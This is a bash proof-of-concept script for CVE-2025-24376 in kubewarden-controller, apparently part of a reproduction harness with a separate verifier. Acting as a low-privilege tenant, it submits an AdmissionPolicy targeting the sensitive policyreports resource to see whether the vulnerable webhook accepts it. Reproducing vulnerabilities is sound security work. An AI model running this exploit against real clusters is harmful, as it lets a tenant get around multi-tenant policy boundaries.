#!/usr/bin/env bash
# CVE-2025-24376 — kubewarden-controller missing sensitive-resource validation.
#
# Acting ONLY as the low-privilege attacker actor (namespaced RBAC on
# admissionpolicies in tenant-a, NOT cluster-admin), submit an AdmissionPolicy
# whose rule targets the sensitive resource wgpolicyk8s.io/policyreports.
#
# On the vulnerable controller (v1.20.1) the validating webhook
# vadmissionpolicy.kb.io accepts and persists the object. On the fixed
# controller (>=1.21.0) the same submission is rejected with a Forbidden
# validation error from validateRulesField.
#
# This script ONLY triggers the bug (submits the policy). It does not verify
# persistence — the verifier confirms that through the independent admin channel.
# Its only "rejected" signal is a non-zero exit from the apply step; that alone
# cannot tell the fixed controller's webhook denial apart from an RBAC denial of
# the attacker actor, so the error text must be inspected before concluding "fixed".
#
# Args:
#   $1 = attacker kubeconfig path (context must authenticate as the tenant-a actor)
#   $2 = malicious AdmissionPolicy manifest path. No -n is passed to kubectl, so
#        the manifest's metadata.namespace (or the kubeconfig context's default
#        namespace) must place the object in tenant-a.
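set -euo pipefail

# Print usage to stderr and exit 2 (argument error).
usage() {
  printf 'Usage: %s <attacker-kubeconfig> <admissionpolicy-manifest>\n' "${0##*/}" >&2
  exit 2
}

# Print a diagnostic to stderr and exit 1.
die() {
  printf '[!] %s\n' "$*" >&2
  exit 1
}

# Check the argument count up front: with `set -u` a missing positional would
# otherwise die with a bare "unbound variable" message.
(( $# == 2 )) || usage

readonly ATTACKER_KUBECONFIG="$1"
readonly POLICY_MANIFEST="$2"
# Absolute path so a PATH entry writable by the attacker actor cannot substitute
# its own kubectl; KUBECTL may be overridden from the environment for hosts that
# install the binary elsewhere (default unchanged).
readonly KUBECTL="${KUBECTL:-/usr/local/bin/kubectl}"

[[ -r "$ATTACKER_KUBECONFIG" ]] || die "attacker kubeconfig not readable: $ATTACKER_KUBECONFIG"
[[ -r "$POLICY_MANIFEST" ]] || die "policy manifest not readable: $POLICY_MANIFEST"
[[ -x "$KUBECTL" ]] || die "kubectl not executable: $KUBECTL"

# Run kubectl strictly under the attacker kubeconfig — never an admin context.
attacker_kubectl() {
  KUBECONFIG="$ATTACKER_KUBECONFIG" "$KUBECTL" "$@"
}

echo "[*] Acting as attacker actor:"
# The identity print is informational. `kubectl auth whoami` depends on
# SelfSubjectReview support in both kubectl and the cluster; where it is missing
# the command fails, and under `set -e` that would abort the run before the bug
# is ever triggered. Warn and continue — an unusable kubeconfig still surfaces
# on the apply below.
if ! attacker_kubectl auth whoami; then
  printf '[!] kubectl auth whoami failed (unsupported or unreachable); continuing\n' >&2
fi

echo "[*] Submitting malicious AdmissionPolicy targeting wgpolicyk8s.io/policyreports ..."
# No -n is forced: the manifest (or the attacker context's default namespace)
# decides where the object lands, so the manifest stays the single source of
# truth for what is submitted.
# NOTE(review): client-side `apply` typically does a GET followed by a CREATE or
# PATCH, so the attacker's RBAC must allow those verbs on admissionpolicies. An
# RBAC denial and the fixed controller's webhook denial both surface here as a
# non-zero exit — check the error text ("admission webhook ... denied the
# request" vs a plain RBAC forbidden) before reading a failure as "fixed".
attacker_kubectl apply -f "$POLICY_MANIFEST"

# Reached only when apply exited 0 (set -e). This shows the API server accepted
# the request without a webhook rejection; it does not by itself prove the object
# was persisted, or that the validating webhook was registered at all — the
# verifier establishes that through the admin channel.
echo "[*] Submission completed without webhook rejection (vulnerable controller accepted it)."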
